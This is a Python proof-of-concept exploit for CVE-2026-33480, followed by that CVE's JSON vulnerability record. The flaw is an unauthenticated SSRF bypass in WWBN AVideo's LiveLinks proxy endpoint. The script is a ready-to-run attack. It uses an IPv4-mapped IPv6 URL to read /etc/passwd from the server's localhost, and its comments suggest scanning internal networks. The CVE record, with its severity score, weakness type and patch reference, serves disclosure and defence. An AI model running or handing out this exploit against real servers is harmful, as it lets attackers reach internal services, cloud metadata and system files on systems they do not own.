CVE-2026-33480

import requests # Target URL of the vulnerable AVideo instance # Replace 'example.com' with the actual target host target_url = "http://example.com/plugin/LiveLinks/proxy.php" # Payload using IPv4-mapped IPv6 address to bypass SSRF checks # This attempts to access the localhost (127.0.0.1) of the server # Change the IP to scan internal networks (e.g., 192.168.1.1) bypass_payload = "http://[::ffff:127.0.0.1]/etc/passwd" params = { "url": bypass_payload } try: print(f"[*] Sending request to: {target_url}") print(f"[*] Payload: {bypass_payload}") response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print("[+] Exploit successful! SSRF bypassed.") print("[+] Response content:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33480", "sourceIdentifier": "[email protected]", "published": "2026-03-23T15:16:34.400", "lastModified": "2026-03-24T18:46:11.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `isSSRFSafeURL()` function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (`::ffff:x.x.x.x`). The unauthenticated `plugin/LiveLinks/proxy.php` endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services. Commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de vídeo de código abierto. En versiones hasta la 26.0 inclusive, la función 'isSSRFSafeURL()' en AVideo puede ser eludida utilizando direcciones IPv6 mapeadas a IPv4 ('::ffff:x.x.x.x'). El punto final no autenticado 'plugin/LiveLinks/proxy.php' utiliza esta función para validar URL antes de recuperarlas con curl, pero el prefijo IPv6 mapeado a IPv4 pasa todas las comprobaciones, permitiendo a un atacante acceder a servicios de metadatos en la nube, redes internas y servicios de localhost. El commit 75ce8a579a58c9d4c7aafe453fbced002cb8f373 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/75ce8a579a58c9d4c7aafe453fbced002cb8f373", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-p3gr-g84w-g8hh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}